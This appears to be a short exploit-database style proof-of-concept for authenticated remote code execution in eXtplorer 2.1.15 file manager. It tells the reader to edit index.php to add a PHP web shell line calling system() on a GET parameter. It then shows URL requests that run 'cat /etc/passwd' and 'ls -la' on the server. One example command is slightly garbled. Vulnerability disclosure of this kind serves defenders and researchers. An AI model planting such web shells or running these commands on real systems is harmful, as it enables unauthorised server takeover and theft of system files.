| 1 | + | Title: eXtplorer 2.1.15 – Insecure Permissions following Remote Code Execution (Authenticated) |
| 2 | + | Date: 2022-11-09 |
| 3 | + | Author: Francisco Marinho |
| 4 | + | Vendor Homepage: http://extplorer.net/ |
| 5 | + | Software Link: http://extplorer.net/attachments/download/99/eXtplorer_2.1.15.zip |
| 6 | + | Version: 2.1.15 |
| 7 | + | Tested on: Linux |
| 8 | + | ==========> POC <========== |
| 9 | + | |
| 10 | + | 1- Login with your account |
| 11 | + | 2- Access the directory /index.php |
| 12 | + | 3- Edit index.php, adding “system($_GET[‘tristao’]);” on line two. |
| 13 | + | 4- Acess homepage index.php |
| 14 | + | Examples: |
| 15 | + | cat /etc/passwd |
| 16 | + | /index.php?tristao=cat%20%20/etc/passwd |
| 17 | + | cat ls -la |
| 18 | + | /index.php?tristao=ls%20-la |
| 19 | + | |